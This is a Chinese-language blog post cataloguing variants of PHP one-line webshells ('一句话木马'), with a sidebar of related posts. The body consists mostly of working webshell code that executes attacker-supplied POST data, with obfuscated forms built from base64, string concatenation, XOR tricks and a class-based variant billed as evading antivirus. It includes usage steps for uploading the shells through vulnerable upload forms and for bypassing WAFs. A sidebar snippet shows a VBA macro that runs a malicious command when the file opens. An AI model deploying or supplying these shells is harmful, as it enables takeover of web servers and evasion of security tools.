一句话木马的变形

最新推荐文章于 2022-11-09 21:37:30 发布
最新推荐文章于 2022-11-09 21:37:30 发布
阅读量1.1k 收藏 7
点赞数 2
分类专栏: 笔记 文章标签: php 正则表达式 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45751902/article/details/127516784
版权

文章目录

初始的一句话木马

<?php @eval($_POST['juminfo']);?> <?php @assert($_POST['juminfo']);?>

找到具有上传漏洞的站点,将该脚本上传,并访问。发现是一片空白,可以说明该木马能被解析。

create_function函数

<?php
$fun = create_function('',$_POST['juminfo']);
$fun();
?>

把用户传递的数据生成一个函数fun(),然后再执行fun()。

call_user_func函数

<?php
@call_user_func(assert,$_POST['juminfo']);
?>

call_user_func这个函数可以调用其它函数,被调用函数是call_user_func的第一个函数被调用的函数参数是call_user_func的第二个参数。这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。

preg_replace函数

<?php
@preg_replace("/abcde/e", $_POST['juminfo'], "abcdefg");
?>

这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行

file_put_contents函数

<?php
$test='<?php $a=$_POST["juminfo"];assert($a); ?>';
file_put_contents("hello.php", $test);
?>

使用方法:先用浏览器访问,生成新的文件"hello.php",再连接"hello.php"。

利用函数生成文件,第一个参数是文件名,第二个参数是文件的内容。

PHP变量函数

<?php
$a = "assert";
$a(@$_POST['juminfo']);
?>

第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。

PHP可变变量

<?php
$bb="assert";
$a="bb";
$$a(@$_POST['juminfo']);
?>

通过上一个语句进行的多一层变化:$$a = ( ( (a) = $ (‘bb’) = $bb = “assert”

str_replace函数

<?php
$a=str_replace("juminfo", "", "assjuminfoert");
$a(@$_POST['juminfo']);
?>

在第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除"juminfo"。

base64_decode函数

<?php
$a=base64_decode("YXNzZXJ0")
$a($_POST['juminfo']);
?>

这里是base64解密函数,"YXNzZXJ0"是assert的base64加密。

"."操作符

<?php
$a="as"."s";
$b="er"."t";
$c=$a.$b;
$c($_POST['juminfo']);
?>

运算符变形

<?php
@$_++;
$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");
$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");
${$__}[!$_](${$___}[$_]);
?>

用echo打印出三个变量$_++、$__、$___可以看到他们的值分别为1、_GET、_POST,放入最后一条语句中刚好组成一个两层的一句话木马。

<?php $_GET[0]($_POST[1])?>

只要我们将0赋值为assert就可以构成经典的一句话<?php assert($_POST[1])?>,密码是1。

在这里插入图片描述

<?php被过滤

<script language="php">@eval($_POST['cmd'])</script>

免杀php一句话

<?php
class VONE {
 function HALB() {
 $rlf = 'B' ^ "\x23";
 $fzq = 'D' ^ "\x37";
 $fgu = 'h' ^ "\x1b";
 $sbe = 'R' ^ "\x37";
 $gba = 'H' ^ "\x3a";
 $oya = 'Y' ^ "\x2d";
 $MWUC = $rlf . $fzq . $fgu . $sbe . $gba . $oya;
 return $MWUC;}function __destruct() {
 $RNUJ = $this->HALB();
 @$RNUJ($this->HY);}}
$vone = new VONE();
@$vone->HY = isset($_GET['id']) ? base64_decode($_POST['mr6']) : $_POST['mr6'];
?>

使用说明

是否传入id参数决定是否把流量编码
 
http://www.xxx.com/shell.php 
POST: mr6=phpinfo();  //与普通shell相同
 
http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)
POST: mr6=cGhwaW5mbygpOwo=  //payload的base64编码

参考

铭说 | 一句话木马的多种变形方式

上传一句话木马时<? php被过滤的解决办法

免杀PHP一句话

空白行
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
上传一句话木马时<? php被过滤的解决办法
ancan8807的博客
09-15 2888
i春秋“百度杯”CTF比赛 九月场 web题 upload 题目描述:想怎么传就怎么传,就是这么任性。tips:flag在flag.php中 打开题目发现 于是想到通过上传一句话木马进入后台 上传一句话木马 <?phpeval($_POST['ant']);?> 提示上传成功,查看网页源代码提示 php文件上传到u/antsword.php...
2017-01-27-一句话木马原理详解
Be Smart
03-17 4574
layout: post title: “一句话木马原理详解” categories: [网络安全CyberSecurity] tags: [一句话木马] 作者:愤怒的小辣椒 链接:https://www.zhihu.com/question/269213687/answer/1088999932 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 首先理解,eval()是把里面的内容按照php代码去执行 菜刀通过你的一句话木马去进行http请求,然后用经过base64编.
变种一句话木马
qq_44060093的博客
04-04 907
墨者学院有一道例题 我们打开网站发现了一串php代码 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?> 看着很乱里面用了好多异或运算,但我们只需要打印出...
一句话木马
热门推荐
飞鱼计划
09-06 1万+
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。 我们如何发送命令,发送的命令如何执行? 我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们...
PHP代码分析 CTF
weixin_30333885的博客
04-15 358
1.练练墨者学院的靶机。关于php 打开如下图。 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?> 2.先执行一下。 前三行为传参...
php一句话变形,一句话后门变形
weixin_30394975的博客
03-13 286
三个变形一句话PHP木马1、$hh="p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$hh("/[discuz]/e",$_POST['h'],"Access");//菜刀一句话2、$filename=$_GET['xbid'];include($filename);//危险的include函数,直接编译任何文件为php格式运行3、$reg="c"...
一个神秘的一句话后门代码详解
weixin_33950035的博客
08-04 273
神秘的一句话后门代码内容:<?php @$_++;$__=("#"^"|");$__.=("."^"~");$__.=("/"^"`");$__.=("|"^"/");$__.=("{"^"/");${$__}[!$_](${$__}[$_]); ?>代码作用:以上代码即是PHP一句话后门,当POST数据为0=assert&1=phpinf...
PHP-CTF】无字母无数字webshell
尚未佩妥剑 转眼便江湖
10-31 7910
PHP无字母数字构造Webshell 题目 index.php: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ //检测字符长度 die("Long."); } if(preg_match("...
文件上传漏洞
m0_59134926的博客
11-09 252
文件上传
一句话木马简介
qq_41272376的博客
02-15 6502
一句话木马简介 一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
一句话图片木马讲解.rar
08-25
一句话图片木马讲解,一句话图片木马讲解,一句话图片木马讲解
探索基于.NET下实现一句话木马之asmx篇1
08-03
云影实验室探索基于.NET 下实现一句话木马之 asmx 篇Ivan@360 云影实验室2018 年 07 月 18 日云影实验室0x01 前言上篇介绍了一般处
Base64是什么? 一句话+一个例子就行了
天程十八的博客
09-17 995
Base64是什么? 是这样一种操作 用64个可打印的字符来表示二进制数据 Base64的编码过程: 比如,转换前的二进制数据如下 10101101,10111010,01110110 ①将八二进制数据按六位一组进行分组,分组后将每一组补位成八位二进制如下:   00101011, 00011011 ,00101001 ,00110110 ②将转换好的八位二进制转成十进制如下   43 27 ...
一淘模板分析PHP内存木马病毒原理
qq_29701691的博客
10-18 1580
网络安全行业,有着很强的木桶效应。系统对抗黑帽,胜负取决于安全最薄弱的环节。黑帽对抗白帽,胜负取决于攻击水平和和毁尸灭迹隐蔽的水平。内存木马,就是在内存中运行的木马病毒,没有代码实体。内存木马有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。一旦病毒样本运行起来,就会删除掉自身,并长期运行在内存当中。以上关键敏感代码都做了编码,用于避开各种安全扫描的免杀。就算被释放的木马被识破后删除,还会产生同样的文件。干掉进程后,删除释放的木马文件。
php 一句话木马简介
whatday的专栏
07-01 1万+
一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php @ev
PHP一句话木马免杀学习
qq_45780190的博客
05-11 2935
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马变形 常用变形函数 convert_uudecode() #解码一个
excel一句话木马
最新发布
01-26
Excel一句话木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被窃取。 以下是一个示例,展示了如何在Excel中创建一句话木马: ```vba Sub Auto_Open() Dim shell As Object Set shell = CreateObject("WScript.Shell") shell.Run "cmd.exe /c your_malicious_command", 0 End Sub ``` 在上述示例中,恶意宏代码使用`WScript.Shell`对象创建一个命令行窗口,并执行`your_malicious_command`命令。这个命令可以是任何你想要在受害者计算机上执行的恶意操作。 请注意,使用恶意宏代码进行攻击是非法的,并且可能导致法律责任。为了保护自己的计算机安全,建议不要打开来自不信任来源的Excel文件,并确保你的计算机有最新的安全补丁和防病毒软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值